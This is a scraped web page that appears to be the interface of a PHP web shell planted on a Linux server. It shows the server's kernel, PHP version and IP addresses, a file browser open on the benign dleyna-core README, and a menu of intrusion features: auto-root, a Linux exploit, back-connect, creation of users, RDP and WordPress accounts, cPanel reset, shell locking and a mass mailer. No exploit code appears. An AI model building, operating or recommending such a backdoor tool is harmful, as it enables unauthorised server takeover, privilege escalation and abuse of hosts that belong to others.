Linux server.flyproject.com.br 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
Apache
: 207.244.227.86 | : 216.73.217.1
10 Domain
7.1.33
hubnog
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
dleyna-core-0.5.0 /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
219
B
-rw-r--r--
COPYING
25.91
KB
-rw-r--r--
ChangeLog
1.05
KB
-rw-r--r--
README
1.71
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README
Introduction: ------------- TODO Compilation ------------ TODO Working with the source code repository --------------------------------------- dleyna-core can be downloaded, compiled and installed as follows: Clone repository # git clone git://github.com/01org/dleyna-core.git # cd dleyna-core Configure and build # ./autogen.sh # make Final installation # sudo make install These instructions are suitable for users who simply want to install and run dleyna-core. However, developers wishing to contribute to the project should follow a separate "Configure and build" step. Configure and build # ./bootstrap-configure # make The script "bootstrap-configure" cleans the repository, calls autreconf and then invokes configure with proper settings for development. These settings include the enabling of maintainer mode and debugging. Developers can remove autogenerated files with the following command # make maintainer-clean Configure Options: ------------------ --enable-werror This option is disabled by default. To enable use --enable-werror. When enabled, all warnings are treated as errors during compilation. Should be enabled during development to ensure that errors do not creep into the code base. This option is enabled by bootstrap-configure. --enable-debug This option is disabled by default. To enable use --enable-debug. When enabled, the make files produce debug builds. This option is enabled by bootstrap-configure. --enable-optimization This option is enabled by default. To disable use --disable-optimization. When enabled it turns on compiler optimizations. Disable = -O0, enable = -O2. --with-log-level See logging.txt for more information about logging.
Close